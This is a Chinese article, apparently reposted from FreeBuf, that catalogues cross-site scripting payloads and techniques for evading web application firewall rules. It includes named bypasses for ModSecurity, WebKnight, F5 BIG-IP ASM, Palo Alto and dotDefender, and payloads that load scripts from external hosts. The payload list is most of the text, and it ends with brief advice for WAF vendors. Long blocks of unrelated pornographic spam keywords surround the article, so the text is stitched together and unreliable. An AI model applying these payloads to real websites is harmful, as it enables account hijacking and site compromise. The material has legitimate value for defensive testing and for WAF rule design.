精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

XSS現代WAF規則探測及繞過技術

安全 應用安全
黑名單方式永遠不是最好的解決辦法,但是相對與白名單效率很高,對于WAF供應商來說,最好的實踐如下:開發者和管理員要注意WAF只能緩解攻擊,并且針對已知的弱點的防護只是和源代碼修復的方法打個時間差……

初始測試

1、使用無害的payload,類似<b>,<i>,<u>觀察響應,判斷應用程序是否被HTML編碼,是否標簽被過濾,是否過濾<>等等;
2、如果過濾閉合標簽,嘗試無閉合標簽的payload(<b,<i,<marquee)觀察響應;
3、嘗試以下的payload
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm      (1);</script>
<script src="http://rhainfosec.com/evil.js">

判斷是否觸發過濾規則,嘗試使用大小寫混合字符

<scRiPt>alert(1);</scrIPt>
1、如果大小寫不行的話,<script>被過濾嘗試<scr<script>ipt>alert(1)</scr<script>ipt>;
2、使用<a>標簽測試
<a  href=“http://www.google.com">Clickme</a>
<a被過濾?
href被過濾?
其他內容被過濾?
如果沒有過濾嘗試使用<a href=”javascript:alert(1)”>Clickme</a>
嘗試使用錯誤的事件查看過濾<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
HTML5擁有150個事件處理函數,可以多嘗試其他函數<body/onhashchange=alert(1)><a href=#>clickit

#p#測試其他標簽

src屬性

<img src=x      onerror=prompt(1);>
<img/src=aaa.jpg      onerror=prompt(1);
<video src=x      onerror=prompt(1);>
<audio src=x      onerror=prompt(1);>

iframe

<iframesrc="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

Embed

<embed/src=//goo.gl/nlX0P>

Action

<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>

mario驗證

<formaction=&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;><button>CLICK

“formaction”屬性

<isindexformaction="javascript:alert(1)"      type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME

“background”屬性

<table background=javascript:alert(1)></table> // Works on Opera 10.5      and IE6

“posters” 屬性

<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5

“data”屬性

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?

“code”屬性

<applet code="javascript:confirm(document.cookie);"> // Firefox Only
<embed  code="http://businessinfo.co.uk/labs/xss/xss.swf"      allowscriptaccess=always>

事件處理

<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">

短payload

<q/oncut=open()>
<q/oncut=alert(1)> //      Useful in-case of payload restrictions.

嵌套欺騙

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body  language=vbsonload=alert-1 // Works with IE8
<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6    9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>      // Works with IE8

圓括號被過濾

<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;

Expression 屬性

<img style="xss:expression(alert(0))"> // Works upto IE7.
<div style="color:rgb(&#039;&#039;x:expression(alert(1))"></div>      // Works upto IE7.
<style>#test{x:expression(alert(/XSS/))}</style>      // Works upto IE7

“location”屬性

<a onmouseover=location=’javascript:alert(1)>click
<body onfocus="location=&#039;javascrpt:alert(1) >123

其他Payload

<meta http-equiv="refresh"      content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh"      content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g      onload="javascript:\u0061lert(1);"></g></svg> //      By @secalert
<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href"      values=";javascript:alert(1)" begin="0s"      dur="0.1s" fill="freeze"/> // By Mario
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg>      // By @secalert
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed

();:被過濾

<svg><script>alert&#40/1/&#41</script>      // Works With All Browsers
( is html encoded to &#40
) is html encoded to &#41

Opera的變量

<svg><script>alert&#40      1&#41 // Works with Opera Only

實體解碼

&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
<a  href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>

編碼

JavaScript是很靈活的語言,可以使用十六進制、Unicode、HTML等進行編碼,以下屬性可以被編碼(支持HTML, Octal, Decimal,Hexadecimal, and Unicode)

href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
data= //只支持base64

#p#基于上下文的過濾

WAF最大的問題是不能理解內容,使用黑名單可以阻擋獨立的js腳本,但仍不能對xss提供足夠的保護,如果一個反射型的XSS是下面這種形式

輸入反射屬性

<input value="XSStest" type=text>
我們可以使用 “><imgsrc=x  onerror=prompt(0);>觸發,但是如果<>被過濾,我們仍然可以使用“ autofocusonfocus=alert(1)//觸發,基本是使用“ 關閉value屬性,再加入我們的執行腳本
" onmouseover="prompt(0) x="
" onfocusin=alert(1)     autofocus x="
" onfocusout=alert(1)     autofocus x="
" onblur=alert(1) autofocus     a="
輸入反射在<script>標簽內
類似這種情況:
<script>
Var
x=”Input”;
</script>
通常,我們使用“></script>,閉合前面的</script>標簽,然而在這種情況,我們也可以直接輸入執行腳本alert(), prompt()
confirm() ,例如:
“;alert(1)//

非常規事件監聽

DOMfocusin,DOMfocusout,等事件,這些需要特定的事件監聽適當的執行。例如:

";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//

此類事件的列表

DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

超文本內容

代碼中的情況如下

<a  href=”Userinput”>Click</a>
可以使用javascript:alert(1)//直接執行<a
href=”javascript:alert(1)//”>Click</a>

變形

主要包含大小寫和JavaScript變形

javascript&#058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;alert&lpar;document&period;cookie&rpar;      // AsharJaved

IE10以下和URI中可以使用VBScript

vbscript:alert(1);
vbscript&#058;alert(1);
vbscr&Tab;ipt:alert(1)"

Data URl

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

JSON內容

反射輸入

encodeURIComponent(&#039;userinput&#039;)

可以使用

-alert(1)-
-prompt(1)-
-confirm(1)-

結果

encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)

輸入反射在svg標簽內

源碼如下:

<svg><script>varmyvar=”YourInput”;</script></svg>

可以輸入

www.site.com/test.php?var=text”;alert(1)//

如果系統編碼了”字符

<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>

原因是引入了附加的(XML)到HTML內容里,可以使用2次編碼處理

#p#瀏覽器BUG

字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集編碼,我們可以繞過99% 的WAF過濾。

示例

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

可以控制編碼,提交

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img src=x onerror=prompt(0);>

可以修改為UTF-32編碼形式

???script?alert(1)?/script?
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

空字節

最長用來繞過mod_security防火墻,形式如下:

<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

空字節只適用于PHP 5.3.8以上的版本

語法BUG

RFC聲明中節點名稱不能是空格,以下的形式在javascript中不能運行

<script>alert(1);</script>
<%0ascript>alert(1);</script>
<%0bscript>alert(1);</script>
<%, <//, <!,<?可以被解析成<,所以可以使用以下的payload
<//     style=x:expression\28write(1)\29> // Works upto IE7
參考http://html5sec.org/#71
<!--[if]><script>alert(1)</script     --> // Works upto IE9
參考http://html5sec.org/#115
<?xml-stylesheet     type="text/css"?><root     style="x:expression(write(1))"/> // Works in IE7
參考 http://html5sec.org/#77
<%div%20style=xss:expression(prompt(1))>     // Works Upto IE7

Unicode分隔符

[on\w+\s*]這個規則過濾了所有on事件,為了驗證每個瀏覽器中有效的分隔符,可以使用fuzzing方法測試0×00到0xff,結果如下:
IExplorer=     [0x09,0x0B,0x0C,0x20,0x3B]
Chrome =     [0x09,0x20,0x28,0x2C,0x3B]
Safari = [0x2C,0x3B]
FireFox=     [0x09,0x20,0x28,0x2C,0x3B]
Opera = [0x09,0x20,0x2C,0x3B]
Android =     [0x09,0x20,0x28,0x2C,0x3B]
x0b在Mod_security中已經被過濾,繞過的方法:
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

缺少X-frame選項

通常會認為X-frame是用來防護點擊劫持的配置,其實也可以防護使用iframe引用的xss漏洞

Docmodes

IE引入了doc-mode很長時間,提供給老版本瀏覽器的后端兼容性,有風險,攻擊情景是黑客可以引用你站點的框架,他可以引入doc-mode執行css表達式

expression(open(alert(1)))

以下POC可以插入到IE7中

<html>
<body>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<iframesrc="https://targetwebsite.com">
</body>
</html>

Window.name欺騙

情景:我們用iframe加載一個頁面,我們可以控制窗口的名稱,這里也可以執行javascript代碼

POC

<iframesrc=&#039;http://www.target.com?foo="xss  autofocus/AAAAA  onfocus=location=window.name//&#039;
name="javascript:alert("XSS")"></iframe>

DOM型XSS

服務器不支持過濾DOM型的XSS,因為DOM型XSS總是在客戶端執行,看一個例子:

<script>
vari=location.hash;
document.write(i);
</script>

在一些情況下,反射型XSS可以轉換成DOM型XSS:
http://www.target.com/xss.php?foo=<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()
上面的POC只在[.+都被允許的情況下適用,可以使用location.hash注入任何不允許的編碼

Location.hash[1] = :  // Defined at the first position after     the hash.
Location.hash[2]= (  // Defined at the second position after     the has
Location.hash[3] = ) // Defined     at third position after the hash.

如果有客戶端過濾可能不適用#p#

繞過

ModSecurity繞過

<scri%00pt>confirm(0);</scri%00pt>
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

參考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

WEB KNIGHT繞過

<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>

F5 BIG IP ASM and Palo ALTO繞過

<table background="javascript:alert(1)"></table> //IE6或者低版本Opera
“/><marquee  onfinish=confirm(123)>a</marquee>

Dot Defender繞過

<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>

結論

黑名單方式永遠不是最好的解決辦法,但是相對與白名單效率很高,對于WAF供應商來說,最好的實踐如下:

1、開發者和管理員要注意WAF只能緩解攻擊,并且針對已知的弱點的防護只是和源代碼修復的方法打個時間差;
2、要保持WAF的規則庫更新;
3、WAF可以配置參數限制,需要提供手冊用于配置參數content-length最大最小長度,content-type類型,在入侵時進行告警;
4、如果WAF依據黑名單,要確保可以阻斷已知的瀏覽器BUG,并且相應規則庫要及時更新。
責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-12-30 14:17:22

WAFWAF指紋探測WAF檢測

2012-12-24 13:50:54

2013-01-11 16:23:29

2013-05-22 18:06:41

2013-06-03 10:02:53

WAF繞過

2019-02-19 08:45:41

2013-05-13 11:25:02

WAFWeb應用防火墻WAF繞過

2020-07-31 11:02:09

網絡攻擊WAF黑客

2011-09-06 16:56:43

2015-06-16 13:37:03

2016-02-15 10:18:11

2017-03-03 09:10:09

2019-07-04 22:54:15

防火墻CMP系統安全

2009-10-26 11:43:43

2014-12-16 10:23:59

2022-03-08 14:23:38

APIWeb前端

2018-03-01 08:56:20

存儲能力定位

2013-04-19 13:20:14

2020-10-15 10:31:33

利用Prototype

2017-08-07 18:45:51

前端JavaScript技術棧
點贊
收藏

51CTO技術棧公眾號

国产经典三级在线| 亚洲国产精品网站| www亚洲欧美| 99在线免费视频观看| 亚洲一区 欧美| 青草在线视频| 韩国一区二区三区| 在线免费不卡视频| 久久99精品久久久久久青青日本| 全网免费在线播放视频入口 | 精品人妻一区二区三区潮喷在线| 嫩呦国产一区二区三区av| 国产精品三级久久久久三级| 欧美一级成年大片在线观看| 国产免费a级片| 在线网址91| 国内精品久久久久影院薰衣草 | 国产精品二区一区二区aⅴ| **精品中文字幕一区二区三区| 国产欧美一区二区精品性色| 日韩av电影在线免费播放| 中文字幕狠狠干| 在线免费av资源| 2023国产精品自拍| 日韩美女毛茸茸| 免费看一级一片| julia中文字幕一区二区99在线| 亚洲六月丁香色婷婷综合久久| 91久久精品国产91久久| 91高清免费看| 久久的色偷偷| 在线欧美日韩精品| 欧美亚洲日本一区二区三区| 午夜影院免费体验区| 国产精品视区| 这里只有精品久久| 热久久久久久久久| 性网站在线观看| 精品国产伦一区二区三| 国产特黄一级片| 日本一二区不卡| 色综合一本到久久亚洲91| 国产九色精品成人porny| 日韩专区在线播放| 永久免费看mv网站入口78| 奇米777日韩| 一区二区福利| 中文字幕国产一区| 国产精品日韩久久久久| 国产不卡视频在线| 亚洲天堂av网站| 免费v片在线观看| 久久久精品免费观看| 国产精品三级久久久久久电影| 日韩毛片在线播放| 国产精品片aa在线观看| 在线不卡中文字幕播放| 国产一级做a爰片久久毛片男| 天天操天天射天天| 美女一区二区视频| 欧美国产一区二区三区| 少妇精品一区二区| 日本免费在线一区| 亚洲福中文字幕伊人影院| 欧美日韩国产综合视频在线| 国产又粗又长又大视频| 在线观看日韩av电影| 亚洲网站视频福利| 无码人妻aⅴ一区二区三区玉蒲团| 国内激情视频在线观看| 国产精品午夜电影| 亚洲一区精彩视频| 天天干天天爽天天操| 99精品久久99久久久久| 成人美女av在线直播| 毛片基地在线观看| 欧美日韩精品| 日韩中文在线中文网三级| 亚洲精品第二页| 另类图片第一页| 欧美久久一区二区| 久久精品一二三四| 国产亚洲欧美日韩精品一区二区三区 | 国产成人高清| 日韩专区在线观看| 国产在线成人精品午夜| 久久精品人人做人人爽电影蜜月| 久久伊人精品一区二区三区| 人人妻人人藻人人爽欧美一区| 少妇精品久久久| 欧美精品一区二区久久婷婷| 91看片就是不一样| av黄色一级片| 啪啪av大全导航福利综合导航| 欧美无乱码久久久免费午夜一区| 欧美在线一区二区| 嫩草影院国产精品| 欧美男男激情videos| 欧美专区亚洲专区| 熟妇女人妻丰满少妇中文字幕| 欧美性极品xxxx做受| 国产色视频一区| 好吊妞视频一区二区三区| 三级欧美在线一区| 日韩一区二区三区xxxx| 2018天天弄| 欧美独立站高清久久| 亚洲欧美制服丝袜| 国产黄色三级网站| 粉嫩一区二区三区四区公司1| 欧美一区二区三区公司| 亚洲va在线va天堂va偷拍| 亚洲不卡系列| 91久久精品一区二区三| 亚洲乱码中文字幕久久孕妇黑人| 狠狠做深爱婷婷综合一区| 日韩精品视频中文在线观看| 中国黄色片免费看| 大桥未久女教师av一区二区| 亚洲无av在线中文字幕| 久久综合亚洲色hezyo国产| 艳女tv在线观看国产一区| 亚洲成av人片观看| 中文字幕综合一区| 国产无码精品在线观看| 久久精品国产第一区二区三区| 日韩美女视频免费在线观看| 91精东传媒理伦片在线观看| 青青国产91久久久久久| 国产成人涩涩涩视频在线观看| 鲁丝一区鲁丝二区鲁丝三区| 亚洲乱码在线观看| 紧缚捆绑精品一区二区| 美脚丝袜一区二区三区在线观看| 污污视频在线看| 欧美日韩高清在线播放| 亚洲怡红院在线| 色婷婷综合久久久久久| 亚洲欧美激情另类校园| 中文字幕 自拍| 97精品在线| 国产精品91免费在线| 亚洲日本中文字幕在线| 亚洲成人在线免费| www.四虎精品| 欧美精品黄色| 91在线中文字幕| 国精品人妻无码一区二区三区喝尿 | 国产欧美日韩精品一区二区三区| 久久久视频精品| 日韩精品一区不卡| 久久九九久久九九| 国产精品欧美激情在线观看 | 午夜一区二区三区| 麻豆av在线导航| 亚洲综合图片区| 亚洲爆乳无码专区| 一本色道久久综合狠狠躁的番外| 中文字幕亚洲欧美在线| 国产精品久久久久久人| 亚洲草久电影| 国产精品久久午夜| 最近免费中文字幕中文高清百度| 久久婷婷国产| 国产呦精品一区二区三区网站| 国产精品美女免费看| 欧美新色视频| 亚洲视频免费观看| 一区二区传媒有限公司| 欧产日产国产精品98| 欧美丰满日韩| 神马午夜久久| 久热国产精品视频| 99久久久久久久| 亚洲精品视频观看| 欧美图片自拍偷拍| 一本综合久久| 日本免费高清一区| 日韩免费网站| 亚洲国产欧美另类丝袜| 9.1在线观看免费| 99riav1国产精品视频| 久久精品国产精品青草色艺| 依依综合在线| 精品剧情在线观看| 很污很黄的网站| 国产日韩欧美| 欧美日韩在线一二三| 日韩在线免费| 久久五月天色综合| 囯产精品久久久久久| 欧美性xxxxxx| 中文字幕乱码av| 国产99久久久久久免费看农村| 日韩高清专区| 在线观看涩涩| 最近2019年中文视频免费在线观看 | 国产极品久久久| 国产精品少妇自拍| 性生活在线视频| 午夜综合激情| 国产亚洲欧美另类一区二区三区| 国产日产一区二区| 欧美三日本三级三级在线播放| 国产又粗又猛又色| 日本女人一区二区三区| 国产精品va在线观看无码| 国产一区二区三区91| 91视频99| 怡红院av在线| 亚洲午夜女主播在线直播| 99精品在线视频观看| 一本一本久久a久久精品综合麻豆| 成人区人妻精品一区二| 麻豆国产91在线播放| 日韩国产一级片| 久久99偷拍| 成人黄色av网站| a欧美人片人妖| 色综合久综合久久综合久鬼88| 国产麻豆一精品一男同| 欧美日韩国产在线看| 国产在线观看无码免费视频| 精品一区精品二区高清| 亚洲国产精品女人| 香蕉成人app| 久久人人爽人人爽人人片av高请| 成人午夜影视| 在线播放91灌醉迷j高跟美女 | 侵犯稚嫩小箩莉h文系列小说| 精品影院一区二区久久久| 国产福利视频在线播放| 亚洲福利电影| www.欧美黄色| 欧美1区视频| 国产成人aa精品一区在线播放 | 国产一区二区三区不卡视频网站| 国产精品日韩高清| xxx.xxx欧美| www.欧美三级电影.com| 国产在线小视频| 4438x成人网最大色成网站| 青青草视频在线观看免费| 中文字幕乱码久久午夜不卡| 亚洲欧美日本一区| 成人精品免费看| 精品免费国产一区二区| 国产日韩欧美高清免费| 久久久久久久中文| 亚洲激情综合| 亚洲精品高清国产一线久久| 国产一区二区久久久久| 性色av一区二区三区| 神马精品久久| 欧美日韩国产综合视频在线观看| 影音先锋在线国产| 成人欧美一区二区三区在线播放| 日本一区二区免费视频| 国产精品资源站在线| 手机看片国产精品| 国产99久久久久| 欧美夫妇交换xxx| 99re视频精品| 魔女鞋交玉足榨精调教| 久久久青草青青国产亚洲免观| 国产精品1000部啪视频| 久久久久久久综合| 亚洲综合欧美综合| 成人性视频网站| 九九视频精品在线观看| 国产精品啊啊啊| 日韩精品视频在线观看网址| 人妻无码中文久久久久专区| 丁香一区二区三区| 国产伦精品一区二区三区精品| 国产成人一区二区精品非洲| 精品美女久久久久久免费| 91成年人网站| 亚洲国产成人自拍| 懂色av蜜臀av粉嫩av永久| 综合av第一页| 国产 日韩 欧美 成人| 福利二区91精品bt7086| 中文天堂在线视频| 精品久久久视频| 亚洲图片欧美日韩| 欧美一区二区三区免费大片 | 亚洲第一av| 国产精品久久77777| 国产美女高潮在线观看| 日本在线观看天堂男亚洲| 99视频这里有精品| 国产日本一区二区三区| 成人精品天堂一区二区三区| 精品国产一区二区三区麻豆免费观看完整版| 精品久久久网| 国产伦精品一区二区三毛| 免费久久久久久久久| 中文字幕一区二区三区精彩视频| 久久不见久久见中文字幕免费| 亚洲综合视频一区| 在线不卡视频| 天堂一区在线观看| 日本伊人色综合网| 国产伦理在线观看| 欧美国产综合一区二区| 久久精品女人毛片国产| 欧美日韩中文字幕精品| 日本美女一级视频| 亚洲国产精品大全| 国产91麻豆视频| 自拍偷拍亚洲区| www.youjizz.com在线| 国产日韩精品视频| 校花撩起jk露出白色内裤国产精品 | 亚洲综合视频在线| 亚洲精品一区二三区| 精品国产凹凸成av人网站| 色三级在线观看| 人妖精品videosex性欧美| 自拍一区在线观看| 99久久一区三区四区免费| 电影91久久久| 欧美一区二区影视| 日韩亚洲精品在线| 欧美xxxx黑人| ...中文天堂在线一区| 亚洲色成人www永久网站| 精品福利二区三区| 中文字幕中文字幕在线十八区 | 中文字幕中文字幕一区| 小向美奈子av| 一区二区三区四区视频精品免费 | 99蜜桃在线观看免费视频网站| 欧美限制电影| 国产一级不卡毛片| 开心九九激情九九欧美日韩精美视频电影 | 国产成人激情av| www.99re7| 91精品久久久久久久99蜜桃 | 亚洲a级精品| 国产3p露脸普通话对白| 国产黑丝在线一区二区三区| 成人做爰视频网站| 欧美日韩国产片| 2017亚洲天堂1024| 欧美精品一区在线播放| 草草视频在线| 国产精品10p综合二区| 一级做a爰片久久毛片16| 亚洲国产综合色| 最新日韩免费视频| 在线一区二区观看| 理论在线观看| 久久久国产91| av在线中出| 国产欧美精品xxxx另类| 亚洲第一二区| 91精品国产毛片武则天| 不卡在线视频| 69av视频在线播放| 日韩中文视频| 日韩国产欧美一区| 日本不卡视频一二三区| 免费成人深夜天涯网站| 在线这里只有精品| 自拍视频在线| 亚洲伊人一本大道中文字幕| 亚洲欧美综合国产精品一区| 国内自拍偷拍视频| 粉嫩av一区二区三区免费野| 日本福利片在线| 国产美女精彩久久| 欧美激情麻豆| 丰满少妇一区二区三区| 日本道精品一区二区三区| 欧美r级在线| 国产精品三区四区| 日韩精品一区第一页| 蜜桃av.com| 亚洲第一福利网站| 久久91导航| a级片一区二区| 精品一区二区三区在线观看国产 | 91精品国产色综合久久不卡98口 | 日本天堂在线观看| 国产在线a不卡| 亚洲有吗中文字幕| 欧美精品欧美极品欧美激情| 欧美天堂在线观看| 黄色精品免费看| 国严精品久久久久久亚洲影视| 日韩精品一区第一页| 成人黄色午夜影院| 希岛爱理av一区二区三区| 日韩视频在线观看一区二区三区| 国模大尺度一区二区三区| 欧美精品久久久久久久久46p| 亚洲第一区中文字幕| 中文一区一区三区高中清不卡免费|